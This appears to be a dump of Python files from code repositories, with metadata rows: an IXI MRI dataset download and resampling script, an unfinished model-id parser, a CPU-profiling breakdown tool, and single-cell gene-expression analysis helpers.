if is_label:
resample.SetInterpolator(sitk.sitkNearestNeighbor)
else:
resample.SetInterpolator(sitk.sitkBSpline)
return resample.Execute(itk_image)
urls = {}
urls['t1'] = 'http://biomedic.doc.ic.ac.uk/brain-development/downloads/IXI/IXI-T1.tar'
urls['t2'] = 'http://biomedic.doc.ic.ac.uk/brain-development/downloads/IXI/IXI-T2.tar'
urls['pd'] = 'http://biomedic.doc.ic.ac.uk/brain-development/downloads/IXI/IXI-PD.tar'
urls['mra'] = 'http://biomedic.doc.ic.ac.uk/brain-development/downloads/IXI/IXI-MRA.tar'
urls['demographic'] = 'http://biomedic.doc.ic.ac.uk/brain-development/downloads/IXI/IXI.xls'
fnames = {}
fnames['t1'] = 't1.tar'
fnames['t2'] = 't2.tar'
fnames['pd'] = 'pd.tar'
fnames['mra'] = 'mra.tar'
fnames['demographic'] = 'demographic.xls'
if DOWNLOAD_IMAGES:
for key, url in urls.items():
if not os.path.isfile(fnames[key]):
print('Downloading {} from {}'.format(fnames[key], url))
curr_file = FancyURLopener()
curr_file.retrieve(url, fnames[key])
else:
print('File {} already exists. Skipping download.'.format(
fnames[key]))
if EXTRACT_IMAGES:
for key, fname in fnames.items():
if (fname.endswith('.tar')):
print('Extracting IXI HH data from {}.'.format(fnames[key]))
output_dir = os.path.join('./orig/', key)
if not os.path.exists(output_dir):
os.makedirs(output_dir)
t = tarfile.open(fname, 'r')
for member in t.getmembers():
if '-HH-' in member.name:
t.extract(member, output_dir)
if PROCESS_OTHER:
xls = pd.ExcelFile('demographic.xls')
print(xls.sheet_names)
df = xls.parse('Table')
for index, row in df.iterrows():
IXI_id = 'IXI{:03d}'.format(row['IXI_ID'])
df.loc[index, 'IXI_ID'] = IXI_id
t1_exists = len(glob.glob('./orig/t1/{}*.nii.gz'.format(IXI_id)))
t2_exists = len(glob.glob('./orig/t2/{}*.nii.gz'.format(IXI_id)))
pd_exists = len(glob.glob('./orig/pd/{}*.nii.gz'.format(IXI_id)))
mra_exists = len(glob.glob('./orig/mra/{}*.nii.gz'.format(IXI_id)))
if not (t1_exists and t2_exists and pd_exists and mra_exists):
df.drop(index, inplace=True)
df.to_csv('demographic_HH.csv', index=False)
if RESAMPLE_IMAGES:
df = pd.read_csv('demographic_HH.csv', dtype=object, keep_default_na=False,
na_values=[]).as_matrix()
for i in df:
IXI_id = i[0]
print('Resampling {}'.format(IXI_id))
t1_fn = glob.glob('./orig/t1/{}*.nii.gz'.format(IXI_id))[0]
t2_fn = glob.glob('./orig/t2/{}*.nii.gz'.format(IXI_id))[0]
pd_fn = glob.glob('./orig/pd/{}*.nii.gz'.format(IXI_id))[0]
mra_fn = glob.glob('./orig/mra/{}*.nii.gz'.format(IXI_id))[0]
t1 = sitk.ReadImage(t1_fn)
t2 = sitk.ReadImage(t2_fn)
pd = sitk.ReadImage(pd_fn)
mra = sitk.ReadImage(mra_fn)
t2_1mm = resample_image(t2)
t1_1mm = reslice_image(t1, t2_1mm)
pd_1mm = reslice_image(pd, t2_1mm)
mra_1mm = reslice_image(mra, t2_1mm)
output_dir = os.path.join('./1mm/', IXI_id)
if not os.path.exists(output_dir):
os.makedirs(output_dir)
print('T1: {} {}'.format(t1_1mm.GetSize(), t1_1mm.GetSpacing()))
print('T2: {} {}'.format(t2_1mm.GetSize(), t2_1mm.GetSpacing()))
print('PD: {} {}'.format(pd_1mm.GetSize(), pd_1mm.GetSpacing()))
print('MRA: {} {}'.format(mra_1mm.GetSize(), mra_1mm.GetSpacing()))
sitk.WriteImage(t1_1mm, os.path.join(output_dir, 'T1_1mm.nii.gz'))
sitk.WriteImage(t2_1mm, os.path.join(output_dir, 'T2_1mm.nii.gz'))
sitk.WriteImage(pd_1mm, os.path.join(output_dir, 'PD_1mm.nii.gz'))
sitk.WriteImage(mra_1mm, os.path.join(output_dir, 'MRA_1mm.nii.gz'))
t2_2mm = resample_image(t2, out_spacing=[2.0, 2.0, 2.0])
t1_2mm = reslice_image(t1, t2_2mm)
pd_2mm = reslice_image(pd, t2_2mm)
mra_2mm = reslice_image(mra, t2_2mm)
output_dir = os.path.join('./2mm/', IXI_id)
if not os.path.exists(output_dir):
os.makedirs(output_dir)
print('T1: {} {}'.format(t2_2mm.GetSize(), t1_2mm.GetSpacing()))
print('T2: {} {}'.format(t2_2mm.GetSize(), t2_2mm.GetSpacing()))
print('PD: {} {}'.format(pd_2mm.GetSize(), pd_2mm.GetSpacing()))
print('MRA: {} {}'.format(mra_2mm.GetSize(), mra_2mm.GetSpacing()))
sitk.WriteImage(t1_2mm, os.path.join(output_dir, 'T1_2mm.nii.gz'))
sitk.WriteImage(t2_2mm, os.path.join(output_dir, 'T2_2mm.nii.gz'))
sitk.WriteImage(pd_2mm, os.path.join(output_dir, 'PD_2mm.nii.gz'))
sitk.WriteImage(mra_2mm, os.path.join(output_dir, 'MRA_2mm.nii.gz'))
if CLEAN_UP:
for key, fname in fnames.items():
if (fname.endswith('.tar')):
os.remove(fname)
os.system('rm -rf orig')
| true | true |
f7190ba74292947809c2128ff0aaecac93157a21 | 815 | py | Python | src/configs/model_id_opts.py | rgalhama/public_ICCM2021 | 6a528a26c649da0843b7acbc785aa99b80d29a74 | [
"MIT"
] | null | null | null | src/configs/model_id_opts.py | rgalhama/public_ICCM2021 | 6a528a26c649da0843b7acbc785aa99b80d29a74 | [
"MIT"
] | null | null | null | src/configs/model_id_opts.py | rgalhama/public_ICCM2021 | 6a528a26c649da0843b7acbc785aa99b80d29a74 | [
"MIT"
] | null | null | null | """
Author : Raquel G. Alhama
Desc:
"""
def strid_to_opts(strid):
    """
    Given model id as string, extract parameter dictionary.
    Reverse of config_loader.opts2strid
    :param strid: model id string of underscore-separated key/value tokens
    :return: dict mapping parameter names to values
    """
    raise NotImplementedError
    # --- Unfinished draft below; unreachable until the raise is removed ---
    parts = strid.split("_")
    # BUGFIX: the original called ",".split("thr,win,...") which splits the
    # comma literal instead of the key list.
    param_keys = "thr,win,dim,neg,dim,size,eig,neg,dyn,cds".split(",")  # finish
    d = {}
    for i, part in enumerate(parts):
        if part == 'post':
            pass
        # BUGFIX: the original tested `not parts[i+1] not in param_keys`
        # (a double negative) and could index past the end of `parts`.
        elif part in param_keys:
            if i + 1 < len(parts) and parts[i + 1] not in param_keys:
                d[part] = parts[i + 1]
            else:  # key without value
                d[part] = 1
        else:  # value token, already consumed as the preceding key's value
            pass
    return d
# for p in parts: | 22.638889 | 76 | 0.516564 | def strid_to_opts(strid):
raise NotImplementedError
parts = strid.split("_")
param_keys=",".split("thr,win,dim,neg,dim,size,eig,neg,dyn,cds")
d={}
for i,part in enumerate(parts):
if part == 'post':
pass
elif part in param_keys:
if i<len(parts) and not parts[i+1] not in param_keys:
k=part
v=parts[i+1]
d[k]=v
else:
k=part
v=1
d[k]=v
else:
pass
return d
| true | true |
f7190ed8730fa9282a09a7f7c60f4b60d4d29e2d | 3,453 | py | Python | hotelReservation/scripts/cpu_breakdown.py | Romero027/DeathStarBench | 185b61851b7a89277c0c2c1845e18776a9dd7201 | [
"Apache-2.0"
] | null | null | null | hotelReservation/scripts/cpu_breakdown.py | Romero027/DeathStarBench | 185b61851b7a89277c0c2c1845e18776a9dd7201 | [
"Apache-2.0"
] | null | null | null | hotelReservation/scripts/cpu_breakdown.py | Romero027/DeathStarBench | 185b61851b7a89277c0c2c1845e18776a9dd7201 | [
"Apache-2.0"
] | null | null | null | import re
import subprocess
import argparse
import statistics
from pathlib import Path
def parse_args():
    """Parse command-line options for the CPU-breakdown profiler.

    ``--app`` is mandatory; ``--proxy`` defaults to 'tcp'.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument('--proxy', type=str, default='tcp',
                        help='proxy type (none, tcp, http or grpc)')
    parser.add_argument('--app', type=str, required=True,
                        help='the name of the application')
    parser.add_argument('-v', '--verbose', action='store_true',
                        help='print the command executed (for debugging purposes)')
    return parser.parse_args()
def get_virtual_cores():
    """Estimate virtual-core usage by sampling system CPU utilization.

    Runs ``mpstat 1 15`` three times, converts each run's trailing
    summary row into an overall utilization percentage (100 minus the
    final column, presumably %idle — confirm against the local mpstat
    format), and scales the mean by 0.64 (machine-specific factor;
    presumably 64 virtual cores / 100% — TODO confirm).

    Returns the estimate as a float.
    """
    print("Running mpstat...")
    cpu_util = []
    # Removed the unused `output = {}` local from the original.
    for _ in range(3):
        cmd = ['mpstat', '1', '15']
        result = subprocess.run(cmd, stdout=subprocess.PIPE)
        # Second-to-last line of mpstat output is the averages row.
        result_average = result.stdout.decode("utf-8").split('\n')[-2].split()
        overall = 100.00 - float(result_average[-1])
        cpu_util.append(overall)
    virtual_cores = statistics.mean(cpu_util)*0.64
    print("Virutal Cores Usage: " + str(virtual_cores))
    return virtual_cores
def get_cpu_percentage(target):
    """Sum the sample percentages of every line in ./result/profile.svg
    that contains *target* (the first decimal number on each matching
    line is taken as that frame's percentage)."""
    # Renamed the accumulator from `sum`, which shadowed the builtin.
    total = 0.0
    with open("./result/profile.svg", 'r') as fp:
        contents = fp.readlines()
    for line in contents:
        if target in line:
            numbers = re.findall(r"\d+\.\d+", line)
            total += float(numbers[0])
    return total
def generate_flamegraph():
    """Profile the system and render a flamegraph.

    Writes folded stacks to ./result/out.profile-folded and the rendered
    SVG to ./result/profile_nosm.svg.
    NOTE(review): get_cpu_percentage() reads ./result/profile.svg, not
    profile_nosm.svg — confirm which artifact is intended.
    """
    print("Generating Flamegraph...")
    profile_cmd = ['python3', './profile.py', '-F 99', '-f', '30']
    print("Running cmd: " + " ".join(profile_cmd))
    with open("./result/out.profile-folded", "wb") as folded_out:
        subprocess.run(profile_cmd, stdout=folded_out)
    render_cmd = ['./flamegraph.pl', './result/out.profile-folded']
    print("Running cmd: " + " ".join(render_cmd))
    with open("./result/profile_nosm.svg", "wb") as svg_out:
        subprocess.run(render_cmd, stdout=svg_out)
def get_cpu_breakdown(virtual_cores, proxy, app):
    """Attribute virtual-core usage to flamegraph frames.

    Buckets (in virtual-core units): read/write/loopback/epoll and
    'envoy' when a proxy is in use, the application itself, 'http'
    filter processing for http/grpc proxies, and 'others' for whatever
    remains unaccounted.
    """
    print("Caculating CPU breakdown...")

    def frac(symbol):
        # Convert a flamegraph percentage for `symbol` into core units.
        return virtual_cores * get_cpu_percentage(symbol) * 0.01

    breakdown = {}
    if proxy != "none":
        breakdown['read'] = frac(">readv (")
        breakdown['loopback'] = frac(">process_backlog (")
        breakdown['write'] = frac(">writev (") - breakdown['loopback']
        breakdown['epoll'] = frac(">epoll_wait (")
        worker_total = frac(">wrk:worker_0 (") + frac(">wrk:worker_1 (")
        breakdown['envoy'] = worker_total - (
            breakdown['read'] + breakdown['write']
            + breakdown['loopback'] + breakdown['epoll'])
    breakdown['app'] = frac(">" + app + " (")
    if proxy == 'http' or proxy == 'grpc':
        breakdown['http'] = frac(
            ">Envoy::Network::FilterManagerImpl::onContinueReading(")
    if proxy != "none":
        accounted = (breakdown['read'] + breakdown['write']
                     + breakdown['loopback'] + breakdown['epoll']
                     + breakdown['envoy'] + breakdown['app'])
        breakdown['others'] = virtual_cores - accounted
    else:
        breakdown['others'] = virtual_cores - breakdown['app']
    return breakdown
if __name__ == '__main__':
    args = parse_args()
    # All intermediate artifacts (folded stacks, SVG) live under ./result.
    Path("./result").mkdir(parents=True, exist_ok=True)
    virtual_cores = get_virtual_cores()
    generate_flamegraph()
    breakdown = get_cpu_breakdown(virtual_cores, args.proxy, args.app)
    print(breakdown)
| 40.151163 | 159 | 0.645526 | import re
import subprocess
import argparse
import statistics
from pathlib import Path
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument('--proxy', type=str, default='tcp', help='proxy type (none, tcp, http or grpc)')
parser.add_argument('--app', type=str, help='the name of the application', required=True)
parser.add_argument("-v", "--verbose", action="store_true", help="print the command executed (for debugging purposes)")
return parser.parse_args()
def get_virtual_cores():
print("Running mpstat...")
cpu_util = []
for i in range(3):
cmd = ['mpstat', '1', '15']
output = {}
result = subprocess.run(cmd, stdout=subprocess.PIPE)
result_average = result.stdout.decode("utf-8").split('\n')[-2].split()
overall = 100.00 - float(result_average[-1])
cpu_util.append(overall)
virtual_cores = statistics.mean(cpu_util)*0.64
print("Virutal Cores Usage: " + str(virtual_cores))
return virtual_cores
def get_cpu_percentage(target):
with open("./result/profile.svg", 'r') as fp:
lines = fp.readlines()
sum = 0.0
for line in lines:
if target in line:
l = re.findall(r"\d+\.\d+", line)
sum += float(l[0])
return sum
def generate_flamegraph():
print("Generating Flamegraph...")
cmd1 = ['python3', './profile.py', '-F 99', '-f', '30']
print("Running cmd: " + " ".join(cmd1))
with open("./result/out.profile-folded", "wb") as outfile1:
result = subprocess.run(cmd1, stdout=outfile1)
cmd2 = ['./flamegraph.pl', './result/out.profile-folded']
print("Running cmd: " + " ".join(cmd2))
with open("./result/profile_nosm.svg", "wb") as outfile2:
result = subprocess.run(cmd2, stdout=outfile2)
def get_cpu_breakdown(virtual_cores, proxy, app):
print("Caculating CPU breakdown...")
breakdown = {}
if proxy != "none":
breakdown['read'] = virtual_cores*get_cpu_percentage(">readv (")*0.01
breakdown['loopback'] = virtual_cores*get_cpu_percentage(">process_backlog (")*0.01
breakdown['write'] = virtual_cores*get_cpu_percentage(">writev (")*0.01 - breakdown['loopback']
breakdown['epoll'] = virtual_cores*get_cpu_percentage(">epoll_wait (")*0.01
breakdown['envoy'] = virtual_cores*get_cpu_percentage(">wrk:worker_0 (")*0.01+virtual_cores*get_cpu_percentage(">wrk:worker_1 (")*0.01
breakdown['envoy'] = breakdown['envoy']-(breakdown['read']+breakdown['write']+breakdown['loopback']+breakdown['epoll'])
breakdown['app'] = virtual_cores*get_cpu_percentage(">"+app+" (")*0.01
if proxy == 'http' or proxy =='grpc':
breakdown['http'] = virtual_cores*get_cpu_percentage(">Envoy::Network::FilterManagerImpl::onContinueReading(")*0.01
if proxy != "none":
breakdown['others'] = virtual_cores-(breakdown['read']+breakdown['write']+breakdown['loopback']+breakdown['epoll']+breakdown['envoy']+breakdown['app'])
else:
breakdown['others'] = virtual_cores-breakdown['app']
return breakdown
if __name__ == '__main__':
args = parse_args()
Path("./result").mkdir(parents=True, exist_ok=True)
virtual_cores = get_virtual_cores()
generate_flamegraph()
breakdown = get_cpu_breakdown(virtual_cores, args.proxy, args.app)
print(breakdown)
| true | true |
f7190f849149f54de70d0c91038ddc9c7fabd157 | 10,482 | py | Python | sccloud/misc/misc.py | klarman-cell-observatory/scCloud.py | 5a04a2f22574db044d018656ac4705ec83840226 | [
"BSD-3-Clause"
] | 3 | 2019-07-29T12:30:28.000Z | 2019-09-20T17:15:35.000Z | sccloud/misc/misc.py | klarman-cell-observatory/scCloud.py | 5a04a2f22574db044d018656ac4705ec83840226 | [
"BSD-3-Clause"
] | 3 | 2019-07-24T15:07:31.000Z | 2019-08-29T13:57:36.000Z | sccloud/misc/misc.py | klarman-cell-observatory/scCloud.py | 5a04a2f22574db044d018656ac4705ec83840226 | [
"BSD-3-Clause"
] | 3 | 2019-07-24T22:50:34.000Z | 2020-12-08T01:19:34.000Z | import numpy as np
import pandas as pd
from typing import List
from anndata import AnnData
from sccloud.io import read_input
def search_genes(
    data: AnnData,
    gene_list: List[str],
    rec_key: str = "de_res",
    measure: str = "percentage",
) -> pd.DataFrame:
    """Tabulate per-cluster statistics for a list of genes.

    Pulls every ``"<measure>:<cluster>"`` field out of the structured DE
    record stored in ``data.varm[rec_key]`` and returns the rows for
    ``gene_list`` (genes absent from ``data.var_names`` appear as NaN).

    Parameters
    ----------
    data: ``anndata.AnnData``
        Annotated data matrix containing the DE results in ``varm``.
    gene_list: ``List[str]``
        Gene symbols to extract, in the desired output order.
    rec_key: ``str``, optional, default: ``"de_res"``
        Keyword of the DE analysis result stored in ``data.varm``.
    measure: ``str``, optional, default: ``"percentage"``
        Field prefix to select, e.g. ``"percentage"`` or ``"mean_logExpr"``.

    Returns
    -------
    ``pandas.DataFrame``
        One row per requested gene, one column per selected field.
    """
    prefix = measure + ":"
    selected = [
        field for field in data.varm[rec_key].dtype.names
        if field.startswith(prefix)
    ]
    frame = pd.DataFrame(data=data.varm[rec_key][selected], index=data.var_names)
    return frame.reindex(index=gene_list)
def search_de_genes(
    data: AnnData,
    gene_list: List[str],
    rec_key: str = "de_res",
    de_test: str = "fisher",
    de_alpha: float = 0.05,
    thre: float = 1.5,
) -> pd.DataFrame:
    """Summarise DE direction and strength for a list of genes.

    For every cluster, each requested gene is flagged as:

    * ``++`` — significant, fold change >= ``thre``;
    * ``+``  — significant, up-regulated but below ``thre``;
    * ``--`` — significant, fold change <= ``1/thre``;
    * ``-``  — significant, down-regulated but above ``1/thre``;
    * ``?``  — not significant; ``NaN`` where the q-value is missing.

    Parameters
    ----------
    data: ``anndata.AnnData``
        Annotated data matrix with DE results in ``data.varm[rec_key]``.
    gene_list: ``List[str]``
        Gene symbols to report.
    rec_key: ``str``, optional, default: ``"de_res"``
        Keyword of the DE analysis result stored in ``data.varm``.
    de_test: ``str``, optional, default: ``"fisher"``
        Test whose q-values are used (``t``, ``fisher`` or ``mwu``).
        Fisher uses ``percentage_fold_change`` fields; the other tests
        use ``log_fold_change`` fields, exponentiated before comparison.
    de_alpha: ``float``, optional, default: ``0.05``
        False discovery rate threshold.
    thre: ``float``, optional, default: ``1.5``
        Fold-change cutoff separating strong (``++``/``--``) from weak
        (``+``/``-``) calls.

    Returns
    -------
    ``pandas.DataFrame``
        Genes as rows, clusters as columns, flag strings as values.
    """
    field_names = data.varm[rec_key].dtype.names
    qval_cols = [f for f in field_names if f.startswith(de_test + "_qval:")]
    qvals = pd.DataFrame(data.varm[rec_key][qval_cols], index=data.var_names)
    qvals = qvals.reindex(index=gene_list)

    fc_prefix = (
        "percentage_fold_change:" if de_test == "fisher" else "log_fold_change:"
    )
    fc_cols = [f for f in field_names if f.startswith(fc_prefix)]
    fold = pd.DataFrame(data.varm[rec_key][fc_cols], index=data.var_names)
    fold = fold.reindex(index=gene_list)
    if de_test != "fisher":
        # Log fold changes are exponentiated so all tests compare on the
        # linear fold-change scale.
        fold = np.exp(fold)

    flags = np.full((len(gene_list), len(fc_cols)), "?", dtype=np.dtype("U4"))
    flags[np.isnan(qvals)] = "NaN"
    significant = (qvals <= de_alpha).values
    # Later assignments refine earlier ones: "++" overwrites "+", "--"
    # overwrites "-".
    flags[significant & (fold > 1.0).values] = "+"
    flags[significant & (fold >= thre).values] = "++"
    flags[significant & (fold < 1.0).values] = "-"
    flags[significant & (fold <= 1.0 / thre).values] = "--"

    cluster_labels = [f.rpartition(":")[2] for f in fc_cols]
    return pd.DataFrame(data=flags, index=gene_list, columns=cluster_labels)
def show_attributes(
    input_file: str,
    show_attributes: bool,
    show_gene_attributes: bool,
    show_values_for_attributes: str,
) -> None:
    """ Show data attributes. For command line use.

    Opens ``input_file`` in backed (read-only) mode and prints, as
    requested: the available cell attributes (``data.obs`` columns), the
    available gene attributes (``data.var`` columns), and the unique
    values of each attribute named in the comma-separated string
    ``show_values_for_attributes`` (``None`` to skip).
    """
    data = read_input(input_file, h5ad_mode="r")
    if show_attributes:
        print(
            "Available sample attributes in input dataset: {0}".format(
                ", ".join(data.obs.columns.values)
            )
        )
    if show_gene_attributes:
        print(
            "Available gene attributes in input dataset: {0}".format(
                ", ".join(data.var.columns.values)
            )
        )
    # Idiom fix: was `if not show_values_for_attributes is None:`.
    if show_values_for_attributes is not None:
        for attr in show_values_for_attributes.split(","):
            print(
                "Available values for attribute {0}: {1}.".format(
                    attr, ", ".join(np.unique(data.obs[attr]))
                )
            )
def perform_oneway_anova(
    data: AnnData,
    glist: List[str],
    restriction_vec: List[str],
    group_str: str,
    fdr_alpha: float = 0.05,
    res_key: str = None,
) -> pd.DataFrame:
    """Perform one way ANOVA on a subset of cells (restricted by restriction_vec) grouped by group_str and control FDR at fdr_alpha.
    Parameters
    ----------
    data : `anndata` object
        An `anndata` object containing the expression matrix.
    glist : `list[str]`
        A list of gene symbols.
    restriction_vec : `list[str]`
        A vector of restrictions for selecting cells. Each restriction takes the format of attr:value,value,value
    group_str : `str`
        How to group selected cells for ANOVA analysis. If group_str is for pseudotime, it has two formats. 1) 'pseudotime:time:n', which divides cells by equal pseudotime interval; 2) 'pseudotime:size:n' divides cells by equal number of cells.
    fdr_alpha : `float`, optional (default: 0.05)
        False discovery rate.
    res_key : `str`, optional (default: None)
        Store results into data using res_key, the grouping information is stored in obs and the results is stored in uns.
    Returns
    -------
    `pandas.DataFrame`
        Results for genes that pass FDR control.
    Examples
    --------
    >>> results = misc.perform_oneway_anova(data, ['CD3E', 'CD4', 'CD8'], [], 'pseudotime:size:10')
    """
    import warnings

    from scipy.stats import f_oneway
    from statsmodels.stats.multitest import fdrcorrection as fdr

    # Build the boolean cell mask from the "attr:v1,v2,..." restriction clauses.
    selected = np.ones(data.shape[0], dtype=bool)
    for rest_str in restriction_vec:
        attr, value_str = rest_str.split(":")
        values = value_str.split(",")
        selected = selected & np.isin(data.obs[attr], values)
    # Keep only requested genes that actually exist in the dataset.
    gene_list = np.array(glist)
    gene_list = gene_list[np.isin(gene_list, data.var_names)]
    ngene = gene_list.size
    newdat = data[selected, :][:, gene_list].copy()
    newdat.X = newdat.X.toarray()  # dense matrix simplifies per-group slicing
    group_values = group_str.split(":")
    group_names = []
    ngr = 0
    group_idx = None  # boolean matrix: group_idx[g, c] == cell c belongs to group g
    if group_values[0] == "pseudotime":
        # Either "pseudotime:time:n" (equal pseudotime intervals) or
        # "pseudotime:size:n" (groups of nearly equal cell counts).
        assert len(group_values) == 3
        div_by = group_values[1]
        ngr = int(group_values[2])
        group_idx = np.zeros((ngr, newdat.shape[0]), dtype=bool)
        pseudotimes = newdat.obs["pseudotime"].values
        min_t = pseudotimes.min()
        max_t = pseudotimes.max()
        if div_by == "time":
            interval = (max_t - min_t) / ngr
            left = min_t - 1e-5  # epsilon so the smallest value lands in bin 0
            for i in range(ngr):
                right = min_t + interval * (i + 1)
                name = "({:.2f}, {:.2f}]".format(left if left >= 0 else 0.0, right)
                group_names.append(name)
                group_idx[i] = (pseudotimes > left) & (pseudotimes <= right)
                left = right
        else:
            assert div_by == "size"
            # Sort cells by pseudotime, then split; the first ``remainder``
            # groups receive one extra cell each.
            ords = np.argsort(pseudotimes)
            quotient = ords.size // ngr
            remainder = ords.size % ngr
            fr = 0
            for i in range(ngr):
                to = fr + quotient + (i < remainder)
                name = "[{:.2f}, {:.2f}]".format(
                    pseudotimes[ords[fr]], pseudotimes[ords[to - 1]]
                )
                group_names.append(name)
                group_idx[i][ords[fr:to]] = True
                fr = to
    else:
        # Generic grouping: "attr:name1~v1,v2;name2~v3,..."
        assert len(group_values) == 2
        group_attr = group_values[0]
        tmp_str = group_values[1]
        groups_str = tmp_str.split(";")
        ngr = len(groups_str)
        group_idx = np.zeros((ngr, newdat.shape[0]), dtype=bool)
        for i, gstr in enumerate(groups_str):
            name, values = gstr.split("~")
            group_names.append(name)
            group_idx[i] = np.isin(newdat.obs[group_attr], values.split(","))
    for i in range(ngr):
        print("Group {} has {} cells.".format(group_names[i], group_idx[i].sum()))
    # BUG FIX: ``np.warnings`` was an accidental alias removed in NumPy 1.25;
    # use the standard-library ``warnings`` module directly.
    warnings.filterwarnings("ignore")
    # Columns: fstat, pval, qval, then (mean, percent expressed) per group.
    stats = np.zeros((ngene, 3 + ngr * 2))
    for i in range(ngene):
        arr_list = []
        for j in range(ngr):
            arr = newdat.X[group_idx[j], i]
            stats[i, 3 + j * 2] = arr.mean()
            stats[i, 3 + j * 2 + 1] = (arr > 0).sum() * 100.0 / arr.size
            arr_list.append(arr)
        stats[i, 0], stats[i, 1] = f_oneway(*arr_list)
        if np.isnan(stats[i, 0]):
            # Constant expression across groups yields NaN; treat as no effect.
            stats[i, 0] = 0.0
            stats[i, 1] = 1.0
    passed, stats[:, 2] = fdr(stats[:, 1])
    cols = ["fstat", "pval", "qval"]
    for i in range(ngr):
        cols.extend([group_names[i] + "_mean", group_names[i] + "_percent"])
    raw_results = pd.DataFrame(stats, columns=cols, index=gene_list)
    results = raw_results[raw_results["qval"] <= fdr_alpha]
    results = results.sort_values("qval")
    if res_key is not None:
        # Persist full results and per-cell group labels back onto ``data``.
        data.uns[res_key] = raw_results
        data.obs[res_key] = "background"
        for i in range(ngr):
            idx = np.zeros(data.shape[0], dtype=bool)
            idx[selected] = group_idx[i]
            data.obs.loc[idx, res_key] = group_names[i]
    return results
| 34.367213 | 244 | 0.592253 | import numpy as np
import pandas as pd
from typing import List
from anndata import AnnData
from sccloud.io import read_input
def search_genes(
    data: AnnData,
    gene_list: List[str],
    rec_key: str = "de_res",
    measure: str = "percentage",
) -> pd.DataFrame:
    """Extract one measure per cluster for the requested genes.

    Pulls every ``measure:<cluster>`` field from the structured record stored
    in ``data.varm[rec_key]`` and returns a DataFrame whose rows follow
    ``gene_list`` order (missing genes become NaN rows via ``reindex``).
    """
    prefix = measure + ":"
    record = data.varm[rec_key]
    fields = [name for name in record.dtype.names if name.startswith(prefix)]
    table = pd.DataFrame(data=record[fields], index=data.var_names)
    return table.reindex(index=gene_list)
def search_de_genes(
    data: AnnData,
    gene_list: List[str],
    rec_key: str = "de_res",
    de_test: str = "fisher",
    de_alpha: float = 0.05,
    thre: float = 1.5,
) -> pd.DataFrame:
    """Summarize differential-expression calls for ``gene_list`` per cluster.

    For each gene and cluster, emit a short code: ``+``/``++`` for
    up-regulation (fold change > 1 / >= ``thre``) at q-value <= ``de_alpha``,
    ``-``/``--`` for down-regulation (fold change < 1 / <= 1/``thre``),
    ``?`` for not significant, and ``NaN`` for a missing q-value.

    NOTE(review): codes are produced by successive overwrites of one result
    matrix, so the assignment order below is load-bearing (``++`` refines
    ``+``; ``--`` refines ``-``) -- do not reorder the mask assignments.
    """
    # q-value columns for the chosen DE test.
    columns = [
        x for x in data.varm[rec_key].dtype.names if x.startswith(de_test + "_qval:")
    ]
    df_de = pd.DataFrame(data.varm[rec_key][columns], index=data.var_names)
    df_de = df_de.reindex(index=gene_list)
    # Fold-change columns: Fisher's test stores percentage fold change,
    # other tests store log fold change.
    columns = [
        x
        for x in data.varm[rec_key].dtype.names
        if (
            x.startswith("percentage_fold_change:")
            if de_test == "fisher"
            else x.startswith("log_fold_change:")
        )
    ]
    df_fc = pd.DataFrame(data.varm[rec_key][columns], index=data.var_names)
    df_fc = df_fc.reindex(index=gene_list)
    if de_test != "fisher":
        # Convert log fold change to linear scale so the thresholds apply.
        df_fc = np.exp(df_fc)
    results = np.zeros((len(gene_list), len(columns)), dtype=np.dtype("U4"))
    results[:] = "?"
    results[np.isnan(df_de)] = "NaN"
    results[(df_de <= de_alpha).values & (df_fc > 1.0).values] = "+"
    results[(df_de <= de_alpha).values & (df_fc >= thre).values] = "++"
    results[(df_de <= de_alpha).values & (df_fc < 1.0).values] = "-"
    results[(df_de <= de_alpha).values & (df_fc <= 1.0 / thre).values] = "--"
    # Column labels are the cluster ids after the ':' in the field names.
    clusts = [x.rpartition(":")[2] for x in columns]
    df = pd.DataFrame(data=results, index=gene_list, columns=clusts)
    return df
def show_attributes(
input_file: str,
show_attributes: bool,
show_gene_attributes: bool,
show_values_for_attributes: str,
) -> None:
data = read_input(input_file, h5ad_mode="r")
if show_attributes:
print(
"Available sample attributes in input dataset: {0}".format(
", ".join(data.obs.columns.values)
)
)
if show_gene_attributes:
print(
"Available gene attributes in input dataset: {0}".format(
", ".join(data.var.columns.values)
)
)
if not show_values_for_attributes is None:
for attr in show_values_for_attributes.split(","):
print(
"Available values for attribute {0}: {1}.".format(
attr, ", ".join(np.unique(data.obs[attr]))
)
)
def perform_oneway_anova(
data: AnnData,
glist: List[str],
restriction_vec: List[str],
group_str: str,
fdr_alpha: float = 0.05,
res_key: str = None,
) -> pd.DataFrame:
from scipy.stats import f_oneway
from statsmodels.stats.multitest import fdrcorrection as fdr
selected = np.ones(data.shape[0], dtype=bool)
for rest_str in restriction_vec:
attr, value_str = rest_str.split(":")
values = value_str.split(",")
selected = selected & np.isin(data.obs[attr], values)
gene_list = np.array(glist)
gene_list = gene_list[np.isin(gene_list, data.var_names)]
ngene = gene_list.size
newdat = data[selected, :][:, gene_list].copy()
newdat.X = newdat.X.toarray()
group_values = group_str.split(":")
group_names = []
col_names = []
ngr = 0
group_idx = None
if group_values[0] == "pseudotime":
assert len(group_values) == 3
div_by = group_values[1]
ngr = int(group_values[2])
group_idx = np.zeros((ngr, newdat.shape[0]), dtype=bool)
pseudotimes = newdat.obs["pseudotime"].values
min_t = pseudotimes.min()
max_t = pseudotimes.max()
if div_by == "time":
interval = (max_t - min_t) / ngr
left = min_t - 1e-5
for i in range(ngr):
right = min_t + interval * (i + 1)
name = "({:.2f}, {:.2f}]".format(left if left >= 0 else 0.0, right)
group_names.append(name)
group_idx[i] = (pseudotimes > left) & (pseudotimes <= right)
left = right
else:
assert div_by == "size"
ords = np.argsort(pseudotimes)
quotient = ords.size // ngr
residule = ords.size % ngr
fr = 0
for i in range(ngr):
to = fr + quotient + (i < residule)
name = "[{:.2f}, {:.2f}]".format(
pseudotimes[ords[fr]], pseudotimes[ords[to - 1]]
)
group_names.append(name)
group_idx[i][ords[fr:to]] = True
fr = to
else:
assert len(group_values) == 2
group_attr = group_values[0]
tmp_str = group_values[1]
groups_str = tmp_str.split(";")
ngr = len(groups_str)
group_idx = np.zeros((ngr, newdat.shape[0]), dtype=bool)
for i, gstr in enumerate(groups_str):
name, values = gstr.split("~")
group_names.append(name)
group_idx[i] = np.isin(newdat.obs[group_attr], values.split(","))
for i in range(ngr):
print("Group {} has {} cells.".format(group_names[i], group_idx[i].sum()))
np.warnings.filterwarnings("ignore")
stats = np.zeros((ngene, 3 + ngr * 2))
for i in range(ngene):
arr_list = []
